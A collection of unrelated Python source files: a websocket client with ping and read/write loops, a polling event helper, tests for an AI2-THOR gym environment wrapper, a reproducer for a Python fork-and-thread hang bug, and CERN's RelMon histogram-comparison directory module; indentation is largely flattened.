OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xa
def signal_handler(sig, frame):
for client in connected_clients[:]:
client.disconnect(abort=True)
if callable(original_signal_handler):
return original_signal_handler(sig, frame)
else: # pragma: no cover
# Handle case where no original SIGINT handler was present.
return signal.default_int_handler(sig, frame)
class ConnectionError(Exception):
pass
class Wsio(EventEmitter):
events = ['connect', 'disconnect', 'message']
def __init__(self):
EventEmitter.__init__(self)
global original_signal_handler
if original_signal_handler is None:
original_signal_handler = signal.signal(
signal.SIGINT, signal_handler)
self.ping_interval = None
self.ping_timeout = None
self.pong_received = True
self.ws = None
self.read_loop_task = None
self.write_loop_task = None
self.ping_loop_task = None
self.ping_loop_event = None
self.queue = None
self.sid = None
self.state = 'disconnected'
def connect(self, url, header={}):
        if self.state != 'disconnected':
self.emit('error', ValueError('Client is not in a disconnected state'))
return False
self.queue=self.create_queue()
try:
ws=websocket.create_connection(url, header=header)
except (IOError, websocket.WebSocketException) as e:
self.emit('error', e)
return False
try:
# handshake packet
p=ws.recv()
except Exception as e:
self.emit('error', e)
ws.close()
return False
handshake_packet=_packet.Packet(encoded_packet=p)
if handshake_packet.packet_type != _packet.HANDSHAKE:
self.emit('error', ConnectionError('no OPEN packet'))
return False
self.sid=handshake_packet.data[u'sid']
self.ping_interval=handshake_packet.data[u'pingInterval']/1000.0
self.ping_timeout=handshake_packet.data[u'pingTimeout']/1000.0
# print 'ping_interval:'+str(self.ping_interval)
# print 'ping_timeout:'+str(self.ping_timeout)
self.state='connected'
connected_clients.append(self)
self.emit('connect')
self.ws=ws
self.ping_loop_task=self.start_background_task(self._ping_loop)
self.write_loop_task=self.start_background_task(self._write_loop)
self.read_loop_task=self.start_background_task(self._read_loop)
return True
def send(self, data):
if self.state != 'connected':
return
self.queue.put(data)
def create_queue(self, *args, **kwargs):
q=queue.Queue(*args, **kwargs)
q.Empty=queue.Empty
return q
def create_event(self, *args, **kwargs):
return threading.Event(*args, **kwargs)
def start_background_task(self, target, *args, **kwargs):
th=threading.Thread(target=target, args=args, kwargs=kwargs)
th.setDaemon(True)
th.start()
return th
def disconnect(self, abort=False):
if self.state == 'connected':
self.queue.put(None)
self.state='disconnecting'
self.emit('disconnect')
self.ws.close()
if not abort:
if self.read_loop_task:
self.read_loop_task.join()
self.state='disconnected'
try:
connected_clients.remove(self)
except ValueError:
pass
self._reset()
def _ping_loop(self):
self.pong_received=True
if self.ping_loop_event is None:
self.ping_loop_event=self.create_event()
else:
self.ping_loop_event.clear()
while(self.state == 'connected' and self.ws.connected):
if not self.pong_received:
self.ws.close(timeout=0)
self.queue.put(None)
break
self.pong_received=False
self.ws.ping()
self.ping_loop_event.wait(timeout=self.ping_interval)
def _write_loop(self):
while self.state == 'connected' and self.ws.connected:
timeout=max(self.ping_interval, self.ping_timeout)+5
packets=None
try:
packets=[self.queue.get(timeout=timeout)]
except self.queue.Empty:
continue
if packets == [None]:
self.queue.task_done()
packets=[]
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets=packets[:-1]
self.queue.task_done()
break
if not packets:
break
try:
for pkt in packets:
self.ws.send(pkt)
self.queue.task_done()
except websocket.WebSocketConnectionClosedException:
break
def _read_loop(self):
while self.state == 'connected' and self.ws.connected:
opcode=None
data=None
try:
opcode, data=self.ws.recv_data(True)
except websocket.WebSocketConnectionClosedException:
self.queue.put(None)
break
except Exception as e:
self.emit('error', e)
self.queue.put(None)
break
if six.PY3 and opcode == OPCODE_TEXT:
data=data.decode("utf-8")
# print 'recv:',data
if opcode in (OPCODE_BINARY, OPCODE_TEXT):
self.emit('message', data)
elif opcode == OPCODE_PONG:
self.pong_received=True
elif opcode == OPCODE_CLOSE:
self.disconnect(abort=True)
self.write_loop_task.join()
if self.ping_loop_event:
self.ping_loop_event.set()
self.ping_loop_task.join()
if self.state == 'connected':
self.emit('disconnect')
try:
connected_clients.remove(self)
except ValueError:
pass
self._reset()
def _reset(self):
self.state='disconnected'
self.sid=None
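# Illustrative usage sketch (the URL is a placeholder; registering handlers for the
# 'connect'/'message'/'disconnect' events depends on the EventEmitter base class, which
# is not shown in this module):
#   client = Wsio()
#   if client.connect('ws://localhost:8080/wsio'):
#       client.send('hello')
#       ...
#       client.disconnect()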
|
events.py
|
from threading import Thread
class Events:
def _handle(self, function: object, wrapper: object) -> None:
data = function()
while True:
_data = function()
if data != _data:
wrapper(_data)
data = _data
def listen(self, *args: object) -> object:
def wrap(wrapper):
thread = Thread(target=self._handle, args=(args[0], wrapper))
thread.start()
return wrap
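# Illustrative usage sketch (poll_value and the handler below are hypothetical): listen()
# registers a handler that is called from a background thread whenever the polled value changes.
#   events = Events()
#
#   @events.listen(poll_value)        # poll_value() is called repeatedly in a loop
#   def on_change(new_value):
#       print('value changed to', new_value)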
|
test_ai2thor_wrapper.py
|
"""
Tests related to the ai2thor environment wrapper.
"""
import random
import threading
import time
import unittest
import warnings
import ai2thor.controller
from gym_ai2thor.envs.ai2thor_env import AI2ThorEnv
class TestAI2ThorEnv(unittest.TestCase):
"""
General environment generation tests
"""
def test_environments_runs(self):
"""
Checks to see if the environment still runs and nothing breaks. Useful for continuous
deployment and keeping master stable. Also, we check how much time 10 steps takes within
        the environment. The final assert checks that max_episode_length equals the number of steps
        taken and that there are no off-by-one errors.
        Prints the execution time at the end of the test as a performance check.
"""
num_steps = 10
env = AI2ThorEnv()
start = time.time()
all_step_times = []
env.reset()
for step_num in range(num_steps):
start_of_step = time.time()
action = env.action_space.sample()
state, reward, done, _ = env.step(action)
time_for_step = time.time() - start_of_step
print('Step: {}. env.task.step_num: {}. Time taken for step: {:.3f}'.
format(step_num, env.task.step_num, time_for_step))
all_step_times.append(time_for_step)
if done:
break
print('Time taken altogether: {}\nAverage time taken per step: {:.3f}'.format(
time.time() - start, sum(all_step_times) / len(all_step_times)))
self.assertTrue(len(all_step_times) == num_steps)
env.close()
def test_all_task_init(self):
"""
Test that the creation of all tasks still works by taking a few random steps after
        resetting the environment
"""
param_list = [
{
'pickup_objects': [
'Mug',
'Apple'
],
'task': {
'task_name': 'PickUpTask',
'target_objects': {'Mug': 1, 'Apple': 5}
}
}
]
for params in param_list:
env = AI2ThorEnv(config_dict=params)
state = env.reset()
for i in range(5):
action = env.action_space.sample()
state, reward, done, _ = env.step(action)
env.close()
def test_cup_task_and_interaction_actions(self):
"""
        Check that picking up and putting down the cup works and that the agent receives a reward of 2 for doing it
twice. For putting the cup down, the agent places it in the microwave and then picks it up
again. Also this implicitly checks there is no random initialisation and that the same
actions in the same environment will achieve the same reward each time.
"""
actions_to_look_at_cup = ['RotateRight', 'RotateRight', 'MoveAhead', 'MoveAhead',
'RotateRight', 'MoveAhead', 'MoveAhead', 'RotateLeft', 'MoveAhead', 'MoveAhead',
'MoveAhead', 'RotateLeft', 'LookDown', 'PickupObject', 'PutObject', 'LookUp',
'MoveRight', 'OpenObject', 'PutObject', 'PickupObject', 'CloseObject']
env = AI2ThorEnv(config_dict={'scene_id': 'FloorPlan28',
'gridSize': 0.25,
'acceptable_receptacles': [
'Microwave' # the used receptacle below
],
'target_objects': {'Mug': 1}})
movement_penalty = len(actions_to_look_at_cup) * env.task.movement_reward
for episode in range(2): # twice to make sure no random initialisation
env.reset()
rewards = []
for action_str in actions_to_look_at_cup:
action = env.action_names.index(action_str)
state, reward, done, _ = env.step(action)
rewards.append(reward)
if done:
break
self.assertAlmostEqual(sum(rewards), 2 + movement_penalty)
env.close()
def test_config_override(self):
"""
Check if reading both a config file and a config dict at the same time works and that the
        correct warning occurs for overwriting. Afterwards, check that scene_id was correctly
        changed by the override
"""
with warnings.catch_warnings(record=True) as warning_objs:
env = AI2ThorEnv(config_file='config_files/config_example.json',
config_dict={'scene_id': 'FloorPlan27'})
# checking if correct warning appears (there could be multiple depending on user)
self.assertTrue([w for w in warning_objs if
'Key: scene_id already in config file' in w.message.args[0]])
self.assertTrue(env.scene_id == 'FloorPlan27')
env.close()
@staticmethod
def test_simple_example():
"""
Taken from here: http://ai2thor.allenai.org/tutorials/examples
"""
controller = ai2thor.controller.Controller()
controller.start()
# Kitchens: FloorPlan1 - FloorPlan30
# Living rooms: FloorPlan201 - FloorPlan230
# Bedrooms: FloorPlan301 - FloorPlan330
        # Bathrooms: FloorPlan401 - FloorPlan430
controller.reset('FloorPlan28')
controller.step(dict(action='Initialize', gridSize=0.25))
event = controller.step(dict(action='MoveAhead'))
# Numpy Array - shape (width, height, channels), channels are in RGB order
event.frame
# Numpy Array in BGR order suitable for use with OpenCV
event.cv2img
# current metadata dictionary that includes the state of the scene
event.metadata
@staticmethod
def test_calling_complex_actions():
"""
Examples of how to interact with environment internals e.g. picking up, placing and
opening objects.
Taken from here: http://ai2thor.allenai.org/tutorials/examples
"""
controller = ai2thor.controller.Controller()
controller.start()
controller.reset('FloorPlan28')
controller.step(dict(action='Initialize', gridSize=0.25))
controller.step(dict(action='Teleport', x=-1.25, y=1.00, z=-1.5))
controller.step(dict(action='LookDown'))
event = controller.step(dict(action='Rotate', rotation=90))
# In FloorPlan28, the agent should now be looking at a mug
for obj in event.metadata['objects']:
if obj['visible'] and obj['pickupable'] and obj['objectType'] == 'Mug':
event = controller.step(dict(action='PickupObject', objectId=obj['objectId']),
raise_for_failure=True)
mug_object_id = obj['objectId']
break
# the agent now has the Mug in its inventory
# to put it into the Microwave, we need to open the microwave first
event = controller.step(dict(action='LookUp'))
for obj in event.metadata['objects']:
if obj['visible'] and obj['openable'] and obj['objectType'] == 'Microwave':
event = controller.step(dict(action='OpenObject', objectId=obj['objectId']),
raise_for_failure=True)
receptacle_object_id = obj['objectId']
break
event = controller.step(dict(action='MoveRight'), raise_for_failure=True)
event = controller.step(dict(action='PutObject',
receptacleObjectId=receptacle_object_id,
objectId=mug_object_id),
raise_for_failure=True)
# close the microwave
event = controller.step(dict(
action='CloseObject',
objectId=receptacle_object_id), raise_for_failure=True)
@staticmethod
def test_multithreaded():
"""
        Stress test that also shows how multi-threading can be used to greatly speed up processing,
        especially to support the rendering of class, object and depth images.
        Adapted from here: http://ai2thor.allenai.org/tutorials/examples
        Extra analysis was done on adding Unity render information, which is important to know when training models.
~67 FPS with 1 thread no extra info
~61 FPS with 1 thread added class info
~18 FPS with 1 thread added Object info on top
~17 FPS with 1 thread added Depth info on top
~70 FPS with 2 threads and no depth, class and object image
~15 FPS with 2 threads and all three of those
Good examples of how to multi-thread are below
"""
thread_count = 1
def run(thread_num):
"""
            Runs 5 iterations of environment resets and steps with different rendering options
            :param thread_num: (int) index of this thread, used only for log messages
"""
env = ai2thor.controller.Controller()
env.start()
render_depth_image, render_class_image, render_object_image = False, False, False
            # 5 is an arbitrary number of iterations
for i in range(5):
t_start = time.time()
env.reset('FloorPlan1')
# env.step({'action': 'Initialize', 'gridSize': 0.25})
# Compare the performance with all the extra added information
                # Big takeaway is that Object instance information makes it much slower
if i == 2:
render_class_image = True
print('Thread num: {}. Added Class info'.format(thread_num))
elif i == 3:
render_object_image = True
print('Thread num: {}. Added Object info'.format(thread_num))
elif i == 4:
render_depth_image = True
print('Thread num: {}. Added Depth info'.format(thread_num))
env.step(dict(action='Initialize',
gridSize=0.25,
renderDepthImage=render_depth_image,
renderClassImage=render_class_image,
renderObjectImage=render_object_image))
print('Thread num: {}. init time: {}'.format(thread_num, time.time() - t_start))
t_start_total = time.time()
for _ in range(10):
env.step({'action': 'MoveAhead'})
env.step({'action': 'RotateRight'})
total_time = time.time() - t_start_total
print('Thread num: {}. Total time for 10 steps: {}. {:.2f} fps'.
format(thread_num, total_time, 50 / total_time))
threads = [threading.Thread(target=run, args=(thread_num, ))
for thread_num in range(thread_count)]
for thread in threads:
thread.daemon = True
thread.start()
time.sleep(1)
for thread in threads:
# calling join() in a loop/timeout to allow for Python 2.7
# to be interrupted with SIGINT
        while thread.is_alive():
thread.join(1)
print('done')
if __name__ == '__main__':
unittest.main()
|
issue_6642.py
|
#!/usr/bin/env python
# https://bugs.python.org/issue6642
import os, sys, time, threading
def worker():
childpid = os.fork()
if childpid != 0:
# Parent waits for child.
os.waitpid(childpid, 0)
else:
# Child spawns a daemon thread and then returns immediately.
def daemon():
while True:
time.sleep(1)
d = threading.Thread(target=daemon)
d.daemon = True
d.start()
# NOTE: We return, and do not call sys.exit(0) or d.join().
# The process should exit without waiting for the daemon thread.
# But due to a bug relating to os.fork and threads it will hang.
return
w = threading.Thread(target=worker)
w.start()
w.join()
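# A hedged sketch (not part of the original reproducer): the usual workaround for
# the hang demonstrated above is to terminate the forked child with os._exit(),
# which skips the interpreter's normal shutdown machinery entirely.
def worker_with_workaround():
    childpid = os.fork()
    if childpid != 0:
        os.waitpid(childpid, 0)
    else:
        d = threading.Thread(target=lambda: time.sleep(3600))
        d.daemon = True
        d.start()
        # Exit the child immediately; nothing after this line runs in the child.
        os._exit(0)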
|
dirstructure.py
|
from __future__ import print_function
from __future__ import absolute_import
################################################################################
# RelMon: a tool for automatic Release Comparison
# https://twiki.cern.ch/twiki/bin/view/CMSPublic/RelMon
#
#
#
# Danilo Piparo CERN - danilo.piparo@cern.ch
#
################################################################################
from array import array
from copy import deepcopy
from os import chdir,getcwd,listdir,makedirs,rmdir
from os.path import exists,join
from time import asctime
import sys
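# PyROOT consumes sys.argv on import; save and restore it around "from ROOT import *".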
argv=sys.argv
from ROOT import *
sys.argv=argv
from .definitions import *
from .utils import setTDRStyle
# Something nice and familiar
setTDRStyle()
# Do not display the canvases
gROOT.SetBatch(kTRUE)
#-------------------------------------------------------------------------------
_log_level=5
def logger(msg_level,message):
if msg_level>=_log_level:
print("[%s] %s" %(asctime(),message))
#-------------------------------------------------------------------------------
class Weighted(object):
def __init__(self,name,weight=1):
self.name=name
self.weight=weight
#-------------------------------------------------------------------------------
class CompInfo(object):
def __init__(self,sample1="",sample2="",release1="",release2="",run1="",run2="",tier1=0,tier2=0):
self.sample1=sample1
self.sample2=sample2
self.release1=release1
self.release2=release2
self.run1=run1
self.run2=run2
self.tier1=tier1
self.tier2=tier2
#-------------------------------------------------------------------------------
class Directory(Weighted):
def __init__(self,name,mother_dir="",meta=CompInfo(),draw_success=False,do_pngs=False):
self.mother_dir=mother_dir
self.meta=meta
self.subdirs=[]
self.comparisons=[]
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.stats_calculated=False
Weighted.__init__(self,name)
self.draw_success=draw_success
self.do_pngs=do_pngs
self.rank_histo=TH1I("rh%s"%name,"",50,-0.01,1.001)
self.rank_histo.SetDirectory(0)
self.different_histograms = {}
self.different_histograms['file1']= {}
self.different_histograms['file2']= {}
self.filename1 = ""
self.filename2 = ""
self.n_missing_objs = 0
self.full_path = ""
def is_empty(self):
if len(self.subdirs)==0 and len(self.comparisons)==0:
return True
return False
def calcStats(self,make_pie=True):
    '''Walk all subdirs and calculate weight, fails and successes.
    Moreover, propagate the sample and release names.
'''
if self.stats_calculated:
return 0
self.n_fails=0
self.n_successes=0
self.n_nulls=0
self.n_comp_fails=0
self.n_comp_successes=0
self.n_comp_nulls=0
self.weight=0
self.n_skiped = 0
self.n_comp_skiped = 0
self.n_missing_objs = len(self.different_histograms['file1'])+len(self.different_histograms['file2'])
if self.n_missing_objs != 0:
print(" [*] Missing in %s: %s" %(self.filename1, self.different_histograms['file1']))
print(" [*] Missing in %s: %s" %(self.filename2, self.different_histograms['file2']))
# clean from empty dirs
self.subdirs = [subdir for subdir in self.subdirs if not subdir.is_empty()]
for comp in self.comparisons:
      if comp.status == SKIPED: # in case it is in the blacklist and was skipped
self.n_skiped += 1
self.n_comp_skiped += 1
self.weight+=1
      else: # original code path: check for fails and successes
self.rank_histo.Fill(comp.rank)
self.weight+=1
if comp.status == FAIL:
self.n_fails+=1
self.n_comp_fails+=1
elif comp.status == SUCCESS:
self.n_successes+=1
self.n_comp_successes+=1
else:
self.n_nulls+=1
self.n_comp_nulls+=1
for subdir in self.subdirs:
subdir.mother_dir=join(self.mother_dir,self.name)
subdir.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
subdir.calcStats(make_pie)
subdir.meta=self.meta
self.weight+=subdir.weight
self.n_fails+=subdir.n_fails
self.n_successes+=subdir.n_successes
self.n_nulls+=subdir.n_nulls
self.n_skiped+=subdir.n_skiped
self.n_missing_objs += subdir.n_missing_objs
self.rank_histo.Add(subdir.rank_histo)
self.stats_calculated=True
self.full_path = join(self.mother_dir,self.name).replace("/Run summary","")
#if make_pie:
#self.__create_pie_image()
def get_subdirs_dict(self):
subdirdict={}
for subdir in self.subdirs:
subdirdict[subdir.name]=subdir
return subdirdict
def get_subdirs_names(self):
subdirnames=[]
for subdir in self.subdirs:
subdirnames.append(subdir.name)
return subdirnames
def get_summary_chart_ajax(self,w=400,h=300):
"""Emit the ajax to build a pie chart using google apis...
"""
url = "https://chart.googleapis.com/chart?"
url+= "cht=p3" # Select the 3d chart
#url+= "&chl=Success|Null|Fail" # give labels
url+= "&chco=00FF00|FFFF00|FF0000|7A7A7A" # give colours to labels
url+= "&chs=%sx%s" %(w,h)
#url+= "&chtt=%s" %self.name
url+= "&chd=t:%.2f,%.2f,%.2f,%.2f"%(self.get_success_rate(),self.get_null_rate(),self.get_fail_rate(),self.get_skiped_rate())
return url
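  # For example, 80% successes, 10% nulls, 5% fails and 5% skipped tests yield a
  # URL ending in "&chd=t:80.00,10.00,5.00,5.00" (success, null, fail, skipped order).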
def print_report(self,indent="",verbose=False):
if len(indent)==0:
self.calcStats(make_pie=False)
# print small failure report
if verbose:
fail_comps=[comp for comp in self.comparisons if comp.status==FAIL]
fail_comps=sorted(fail_comps,key=lambda comp:comp.name )
if len(fail_comps)>0:
print(indent+"* %s/%s:" %(self.mother_dir,self.name))
for comp in fail_comps:
print(indent+" - %s: %s Test Failed (pval = %s) " %(comp.name,comp.test_name,comp.rank))
for subdir in self.subdirs:
subdir.print_report(indent+" ",verbose)
if len(indent)==0:
print("\n%s - summary of %s tests:" %(self.name,self.weight))
print(" o Failiures: %.2f%% (%s/%s)" %(self.get_fail_rate(),self.n_fails,self.weight))
print(" o Nulls: %.2f%% (%s/%s) " %(self.get_null_rate(),self.n_nulls,self.weight))
print(" o Successes: %.2f%% (%s/%s) " %(self.get_success_rate(),self.n_successes,self.weight))
print(" o Skipped: %.2f%% (%s/%s) " %(self.get_skiped_rate(),self.n_skiped,self.weight))
print(" o Missing objects: %s" %(self.n_missing_objs))
def get_skiped_rate(self):
if self.weight == 0: return 0
return 100.*self.n_skiped/self.weight
def get_fail_rate(self):
if self.weight == 0:return 0
return 100.*self.n_fails/self.weight
def get_success_rate(self):
if self.weight == 0:return 1
return 100.*self.n_successes/self.weight
def get_null_rate(self):
if self.weight == 0:return 0
return 100.*self.n_nulls/self.weight
def __get_full_path(self):
#print "Mother is %s" %self.mother_dir
if len(self.mother_dir)==0:
return self.name
return join(self.mother_dir,self.name)
def __create_on_disk(self):
if not exists(self.mother_dir) and len(self.mother_dir)!=0:
makedirs(self.mother_dir)
full_path=self.__get_full_path()
if not exists(full_path) and len(full_path)>0:
makedirs(full_path)
def get_summary_chart_name(self):
return join(self.__get_full_path(),"summary_chart.png")
def __create_pie_image(self):
self.__create_on_disk()
vals=[]
colors=[]
for n,col in zip((self.n_fails,self.n_nulls,self.n_successes,self.n_skiped),(kRed,kYellow,kGreen,kBlue)):
if n!=0:
vals.append(n)
colors.append(col)
valsa=array('f',vals)
colorsa=array('i',colors)
can = TCanvas("cpie","TPie test",100,100);
try:
pie = TPie("ThePie",self.name,len(vals),valsa,colorsa);
label_n=0
if self.n_fails!=0:
pie.SetEntryLabel(label_n, "Fail: %.1f(%i)" %(self.get_fail_rate(),self.n_fails) );
label_n+=1
if self.n_nulls!=0:
pie.SetEntryLabel(label_n, "Null: %.1f(%i)" %(self.get_null_rate(),self.n_nulls) );
label_n+=1
if self.n_successes!=0:
pie.SetEntryLabel(label_n, "Success: %.1f(%i)" %(self.get_success_rate(),self.n_successes) );
if self.n_skiped!=0:
pie.SetEntryLabel(label_n, "Skipped: %.1f(%i)" %(self.get_skiped_rate(),self.n_skiped));
pie.SetY(.52);
pie.SetAngularOffset(0.);
pie.SetLabelsOffset(-.3);
#pie.SetLabelFormat("#splitline{%val (%perc)}{%txt}");
pie.Draw("3d nol");
can.Print(self.get_summary_chart_name());
    except Exception:
print("self.name = %s" %self.name)
print("len(vals) = %s (vals=%s)" %(len(vals),vals))
print("valsa = %s" %valsa)
print("colorsa = %s" %colorsa)
def prune(self,expandable_dir):
"""Eliminate from the tree the directory the expandable ones.
"""
#print "pruning %s" %self.name
exp_index=-1
counter=0
for subdir in self.subdirs:
# Eliminate any trace of the expandable path in the mother directories
# for depths higher than 1
subdir.mother_dir=subdir.mother_dir.replace("/"+expandable_dir,"")
if subdir.name==expandable_dir:
exp_index=counter
counter+=1
# Did we find an expandable?
if exp_index>=0:
exp_dir=self.subdirs[exp_index]
for subsubdir in exp_dir.subdirs:
#print "*******",subsubdir.mother_dir,
subsubdir.mother_dir=subsubdir.mother_dir.replace("/"+expandable_dir,"")
while "//" in subsubdir.mother_dir:
print(subsubdir.mother_dir)
subsubdir.mother_dir=subsubdir.mother_dir.replace("//","/")
#print "*******",subsubdir.mother_dir
self.subdirs.append(subsubdir)
for comp in exp_dir.comparisons:
comp.mother_dir=comp.mother_dir.replace("/"+expandable_dir,"")
while "//" in comp.mother_dir:
        comp.mother_dir=comp.mother_dir.replace("//","/")
      if comp not in self.comparisons: # avoid appending the same comparison more than once
self.comparisons.append(comp) # add a comparison
self.n_comp_fails = exp_dir.n_comp_fails #copy to-be removed directory
self.n_comp_nulls = exp_dir.n_comp_nulls # numbers to parent directory
self.n_comp_successes = exp_dir.n_comp_successes
self.n_comp_skiped = exp_dir.n_comp_skiped
del self.subdirs[exp_index]
self.prune(expandable_dir)
for subdir in self.subdirs:
subdir.prune(expandable_dir)
def __repr__(self):
if self.is_empty():
return "%s seems to be empty. Please check!" %self.name
content="%s , Rates: Success %.2f%%(%s) - Fail %.2f%%(%s) - Null %.2f%%(%s)\n" %(self.name,self.get_success_rate(),self.n_successes,self.get_fail_rate(),self.n_fails,self.get_null_rate(),self.n_nulls)
for subdir in self.subdirs:
content+=" %s\n" % subdir
for comp in self.comparisons:
content+=" %s\n" % comp
return content
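# A minimal usage sketch (not part of the original module), assuming ROOT and the
# RelMon definitions are importable and that Comparison objects were produced elsewhere:
#
#   top = Directory("DQMData")
#   sub = Directory("Tracking", mother_dir="DQMData")
#   sub.comparisons.extend(comparisons)   # hypothetical list of Comparison objects
#   top.subdirs.append(sub)
#   top.calcStats(make_pie=False)         # aggregate weights, fails and successes
#   top.print_report(verbose=True)        # per-directory failure summary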
#-------------------------------------------------------------------------------
from multiprocessing import Process
def print_multi_threaded(canvas,img_name):
canvas.Print(img_name)
tcanvas_print_processes=[]
#-------------------------------------------------------------------------------
class Comparison(Weighted):
canvas_xsize=500
canvas_ysize=400
def __init__(self,name,mother_dir,h1,h2,stat_test,draw_success=False,do_pngs=False, skip=False):
self.name=name
self.png_name="placeholder.png"
self.mother_dir=mother_dir
self.img_name=""
#self.draw_success=draw_success
Weighted.__init__(self,name)
stat_test.set_operands(h1,h2)
if skip:
self.status = SKIPED
      self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.rank = 0
else:
self.status=stat_test.get_status()
self.rank=stat_test.get_rank()
self.test_name=stat_test.name
self.test_thr=stat_test.threshold
self.do_pngs=do_pngs
self.draw_success=draw_success or not do_pngs
if ((self.status==FAIL or self.status==NULL or self.status == SKIPED or self.draw_success) and self.do_pngs):
self.__make_image(h1,h2)
#self.__make_image(h1,h2)
def __make_img_dir(self):
if not exists(self.mother_dir):
makedirs(self.mother_dir)
def __get_img_name(self):
#self.__make_img_dir()
#print "MOTHER: ",self.mother_dir
self.img_name="%s/%s.png"%(self.mother_dir,self.name)
self.img_name=self.img_name.replace("Run summary","")
self.img_name=self.img_name.replace("/","_")
self.img_name=self.img_name.strip("_")
#print "IMAGE NAME: %s " %self.img_name
return self.img_name
def tcanvas_slow(self,canvas):
#print "About to print %s" %self.img_name
#print_multi_threaded(canvas,self.img_name)
#print "-->Printed"
p = Process(target=print_multi_threaded, args=(canvas,self.img_name))
p.start()
tcanvas_print_processes.append(p)
n_proc=len(tcanvas_print_processes)
if n_proc>3:
p_to_remove=[]
      for iprocess in range(n_proc):
p=tcanvas_print_processes[iprocess]
p.join()
p_to_remove.append(iprocess)
adjustment=0
for iprocess in p_to_remove:
tcanvas_print_processes.pop(iprocess-adjustment)
adjustment+=1
def __make_image(self,obj1,obj2):
self.img_name=self.__get_img_name()
if self.rank==-1:
return 0
canvas=TCanvas(self.name,self.name,Comparison.canvas_xsize,Comparison.canvas_ysize)
objs=(obj1,obj2)
# Add some specifics for the graphs
obj1.SetTitle(self.name)
    if obj1.GetNbinsY()!=0 and "2" not in obj1.ClassName():
      obj1.SetLineWidth(2)
      obj2.SetLineWidth(2)
obj1.SetMarkerStyle(8)
obj1.SetMarkerSize(.8)
obj2.SetMarkerStyle(8)
obj2.SetMarkerSize(.8)
obj1.SetMarkerColor(kBlue)
obj1.SetLineColor(kBlue)
obj2.SetMarkerColor(kRed)
obj2.SetLineColor(kRed)
obj1.Draw("EP")
#Statsbox
obj2.Draw("HistSames")
#gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
else:
obj1.Draw("Colz")
gPad.Update()
#if 'stats' in map(lambda o: o.GetName(),list(gPad.GetListOfPrimitives())):
#st = gPad.GetPrimitive("stats")
#st.SetY1NDC(0.575)
#st.SetY2NDC(0.735)
#st.SetLineColor(kRed)
#st.SetTextColor(kRed)
#print st
obj2.Draw("ColSame")
# Put together the TLatex for the stat test if possible
color=kGreen+2 # which is green, as everybody knows
if self.status==FAIL:
print("This comparison failed %f" %self.rank)
color=kRed
elif self.status==NULL:
color=kYellow
elif self.status==SKIPED:
      color=kBlue # kBlue is defined in ROOT
lat_text="#scale[.7]{#color[%s]{%s: %2.2f}}" %(color,self.test_name,self.rank)
lat=TLatex(.1,.91,lat_text)
lat.SetNDC()
lat.Draw()
# Put also the stats together!
n1=obj1.GetEntries()
if n1> 100000:
n1="%e"%n1
else:
n1="%s"%n1
n2=obj2.GetEntries()
if n2> 100000:
n2="%e"%n2
else:
n2="%s"%n2
lat_text1="#scale[.7]{#color[%s]{Entries: %s}}" %(obj1.GetLineColor(),n1)
lat1=TLatex(.3,.91,lat_text1)
lat1.SetNDC()
lat1.Draw()
lat_text2="#scale[.7]{#color[%s]{Entries: %s}}" %(obj2.GetLineColor(),n2)
lat2=TLatex(.6,.91,lat_text2)
lat2.SetNDC()
lat2.Draw()
self.tcanvas_slow(canvas)
def __repr__(self):
return "%s , (%s=%s). IMG=%s. status=%s" %(self.name,self.test_name,self.rank,self.img_name,self.status)
#-------------------------------------------------------------------------------
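# A hedged usage sketch (not part of the original module): a Comparison pairs two
# histograms with a statistical test object (here `ks_test` is a hypothetical test
# instance from the RelMon test utilities) and optionally renders a comparison png.
#
#   comp = Comparison("hPt", "DQMData/Tracking", h1, h2, ks_test, do_pngs=True)
#   print(comp)   # name, test name and rank, image name, status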
|